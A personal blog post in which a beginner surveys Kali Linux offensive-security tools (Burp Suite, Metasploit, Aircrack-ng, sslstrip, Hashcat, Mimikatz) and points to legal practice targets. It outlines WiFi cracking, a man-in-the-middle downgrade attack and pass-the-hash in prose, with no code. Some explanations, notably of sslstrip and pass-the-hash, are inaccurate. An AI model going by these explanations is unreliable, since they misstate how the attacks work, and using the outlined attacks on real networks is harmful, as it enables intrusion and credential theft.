So in this post I started documenting my efforts to learn about offensive security by researching vulnerability reports. In the present post, I will be documenting my efforts to learn about offensive security by exploring a Linux distro designed specifically for that purpose: Kali Linux.
Kali is a Linux distro based on Debian. In fact it is almost identical to vanilla Debian except for a few superficial changes to the interface and the addition of a wide array of hacking tools. I can only assume the name comes from the Hindu goddess Kali, who is the goddess of death and destruction, which kinda resonates with the whole theme of offensive security and penetration testing. Kali Linux was originally called Backtrack Linux, but it was rechristened in 2012.
My method of research has been pretty obvious and unoriginal: All I do is look through the main menu on the top titlebar and see what software titles I can find there, then I look them up on the Internet using a standard search engine. Here’s what I’ve found…
lbd and wafw00f
The first step of any online attack is reconnaissance. When attacking a server, either for pen-testing purposes or for black hat hacking purposes, it helps to know if that server is protected by an IDS or IPS. Kali Linux has two IDS/IPS detection tools that check for different kinds of intrusion detection. lbd detects load balancing, while wafw00f detects a web application firewall or WAF.
Let’s look at lbd first. Its name is an acronym for “Load Balancing Detector”. Load balancing is used on larger sites that handle massive amounts of traffic from all over the world and therefore must spread it over multiple redundant servers. A load balancer is essentially a reverse proxy that takes incoming connections and sends them to whichever server currently has the lightest traffic load. Since load balancers provide a layer between the client and the server and essentially make direct access to the server impossible, they also allow for the implementation of IDS and IPS software at the proxy level. They also provide protection against several denial-of-service attacks, including DDoS and SYN floods.
wafw00f is a reconnaissance program that detects if there is a web application firewall (WAF) protecting the server. A WAF is different from a regular firewall in that whereas a regular firewall filters packets at the network layer, a WAF filters packets at the application layer, allowing for much more sophisticated attack detection and prevention based on patterns in the HTTP requests, as opposed to just IP addresses.
Both lbd and wafw00f are Unix scripts that work by sending requests to a server and analyzing the responses to see if they indicate an IDS or IPS at the other end. lbd determines the range of IP addresses used on the other end, while wafw00f sends HTTP requests to the server and looks at the responses it gets back. You can use this information to know what kind of adversary you’re dealing with and what sort of attack you should use against it.
SPIKE is a framework for writing fuzzers, or programs that perform fuzzing on a target application. Fuzzing is a reverse engineering method that is used when you don’t have access to a binary that you can conveniently debug or disassemble. It’s used to find security vulnerabilities in web applications and other software that runs on a remote server. It basically involves sending specially crafted packets – which may be deliberately malformed – to the server and seeing what kinds of responses you get. The exact responses sent by the application can indicate details about its internal operation without having to view the source code. Fuzzing is commonly used to debug applications running over a network for bug bounty purposes.
The SPIKE framework provides a debugging interface much like
gdb, except the output is based on network messages rather than the state of the CPU. You create a separate file for each message you want to send. These files are called spikes, and they have the extension .spk. You can run these spike scripts one after the other, use a packet sniffer to capture the packets, and then use the debugger to analyze them. The debugger can give you information such as the response to each spike and which spike caused a crash if one occurred.
No survey of Kali Linux software would be complete without this one. Burp Suite is probably the quintessential tool for scanning and pen-testing web applications for a variety of different exploits. It basically tests for every known web application vulnerability under the sun – XSS exploits, SQL injections, and several others.
Burp Suite has a few different components. The one you typically access directly is the Burp Scanner. This works with the Burp Browser to perform browser-powered scanning, which is a scanning and exploitation method that emulates the full functionality of a web browser in a non-interactive mode so that exploits can be automated. The Burp Proxy sits between the Burp Browser and the server and collects HTTP requests and responses for further analysis. Upon collecting this information, Burp will generate a sitemap containing every web page on the site along with a log of all the exploits it has discovered.
If you want to try individual exploits against a site, you can use the Burp Intruder in combination with a web browser. You can either use the Burp Browser in interactive mode, or use an external browser and configure it to route traffic through Burp Proxy at port 8080. Once requests are intercepted by Burp Proxy, you can modify them in Burp Intruder, changing various fields of the request headers to craft a custom HTTP request. This can be used for various purposes, such as fuzzing through repeated requests, modifying variables to perform SQL or other remote code injections, or even spoofing your user agent.
Another central tool in the Kali Linux arsenal is the Metasploit framework. Metasploit is a suite of command line tools used for finding and developing exploits. It contains a command line interface in the form of
msfconsole, scanning capabilities analogous to NMap, a shell for logging into a target machine (Meterpreter), modules corresponding to individual exploits, a database for keeping track of hosts, services, and vulnerabilities, and scripting capabilities through both Ruby and Python.
One of the primary applications of Metasploit is the development and automation of exploits. Modules for exploits are often provided by the community, usually whenever a new exploit is discovered, but the real fun IMO is in writing custom modules for your own exploits (keep in mind I haven’t actually done this yet, so I’m speaking hypothetically here). Exploit modules for Metasploit are written in the Ruby programming language, using various libraries, APIs, and plugins provided by the framework. In addition to basic exploitation techniques, Metasploit’s Ruby libraries provide functionality for evading IDS’s, IPS’s, and antivirus programs through randomization and
Metasploit doesn’t just provide the tools for hacking systems. It also provides a convenient practice system called Metasploitable. This is an intentionally vulnerable operating system that you can install in a virtual machine using bridged networking mode, then use the IP address of that VM as your target. While I was doing my research on Kali Linux software, I discovered a number of these “intentionally vulnerable” applications, which provide a wealth of completely legal targets for recreational hacking. Other names in this category include DVWA – the Damn Vulnerable Web Application, portswigger-labs.net – a sandboxed website for pen-testing (provided by the people who wrote Burp Suite), and VulnServer – an exploitable TCP server application.
Aircrack-ng is a suite of tools for cracking WiFi encryption and stealing session keys used by WiFi networks. It is capable of cracking not just the horrendously flawed WEP protocol but also the more secure WPA and WPA2. The suite is very modular in nature, consisting of a collection of different programs and scripts that each do one thing very well, much in keeping with the general Unix philosophy. These tools are used in succession, with each representing one step of the WiFi cracking process.
Let’s explore a typical sequence of Aircrack-ng scripts. The main program is
aircrack-ng, which examines a dump of raw WiFi frames and extracts the encryption key from them, which it then uses to decrypt the packets. Of course you first need to get the frame dump. To do this you use a program called
airodump-ng. This just listens to frames intercepted by the WNIC while in Monitor Mode and saves them for
aircrack-ng to look at later. The problem with this is that the WNIC is not in Monitor Mode by default. To switch in and out of Monitor Mode, you use a third program called
airmon-ng. Monitor Mode is one of eight modes that a WNIC can be in, and it basically means that the interface listens to all frames coming from all networks in the vicinity, regardless of whether it is connected to them or can actually decrypt the frames.
sslstrip is a tool written by Moxie Marlinspike to demonstrate an attack he discovered on the SSL protocol, which he presented at BlackHat 2009. The attack is what’s known as a protocol downgrade attack: an exploit that involves forcing security software to abandon an up-to-date, secure protocol in favor of an older or less secure protocol to make exploitation easier. The purpose of sslstrip is to essentially remove the SSL/TLS encryption from web traffic by downgrading the protocol used from HTTPS to vanilla HTTP.
The way the exploit works is as follows: First you need to be in a position where you can sniff traffic between two hosts. For example, you could install sslstrip on an Internet router, or have it running on a WiFi-connected computer where you can sniff packets (e.g. with the Aircrack-ng tools). You then use the data from the sniffed packets to reconstruct and steal the session key, which you then use to spoof one host to the other, in both directions. This puts you in the position for a man-in-the-middle attack, where you can intercept all packets between the hosts, modify them, and forward them to their destination. The modification you make is simply replacing “https” with “http” in the URL of every HTTP request, which effectively decrypts the traffic. The idea is to do this transparently, without the two communicating hosts even knowing you’re there.
Hashcat is password recovery program that is used to reverse a number of hashes, including MD4, MD5, SHA-family, and Unix Crypt formats, among others. There are two versions of this program: regular Hashcat, which does all its processing on the CPU; and oclHashcat, which utilizes the GPU for improved performance.
Hashcat is built on the OpenCL framework, which is a cross-platform C/C++ framework used for programming across several different kinds of execution units, including CPUs, GPUs, etc. There are basically two ways in which one uses the OpenCL interface: one is to program in the OpenCL C language, which is a variant of C99 specifically for the framework; and the other is to use the OpenCL API for C or C++. These two methods are actually used together. OpenCL programs are compiled in a JIT fashion into the native machine language used by whatever execution unit is intended to be used for computation. This makes it so OpenCL code can be portable across different kinds of devices, be they CPUs, GPUs, or otherwise. So if you have an OpenCL program that you’ve written, you can optionally compile it into 80×86 machine code so it utilizes an Intel CPU, or you can compile it into say nVidia machine code (I don’t know what the official name for the nVidia architecture is) to have it utilize your GPU if you’re using nVidia.
Running Hashcat on the GPU with OpenCL allows it to be much faster, since the GPU hardware is optimized for computationally intensive tasks like 3D graphics. Thus it is optimal for running a password cracker, which in most cases must brute-force its way through millions of possible passwords before finding a match. The password recovery program hashes passwords that are either generated in a brute-force fashion or taken from a dictionary, or a hybrid of these two approaches, and keeps doing so until the hashes match. In pen-testing jargon, this is known as a preimage attack.
Mimikatz is a lot like sslstrip in that it was originally written as an ad hoc program to demonstrate a specific vulnerability, but it evolved into a much more general pen-testing program encompassing a wide range of similar exploits. Originally created by Benjamin Delpy, Mimikatz focuses on authentication vulnerabilities in the Windows platform. It allows users to intercept, store, and view Windows login credentials.
In researching this particular tool, I learned about a number of different exploits pertaining to authentication. One of these is the pass-the-hash exploit, which involves sniffing the hash as it’s sent over the network (as is done in protocols like Kerberos) and then passing that hash directly to the authentication server, thus bypassing the need to do a preimage attack on the hash. Another common exploit is pass-the-ticket – a more modern version of pass-the-hash that is based in tickets, which form the basis for modern Windows authentication. There’s also pass-the-cache, which expands Mimikatz’s relevance to the *Nix world by stealing cached login data from a Unix/Linux system.
So that was just a non-comprehensive survey of some of the software available on Kali Linux. I definitely learned a lot from this little research project, and I feel like I now have the tools to do pen-testing and bug bounty hunting without breaking the law. Farewell, and happy hacking!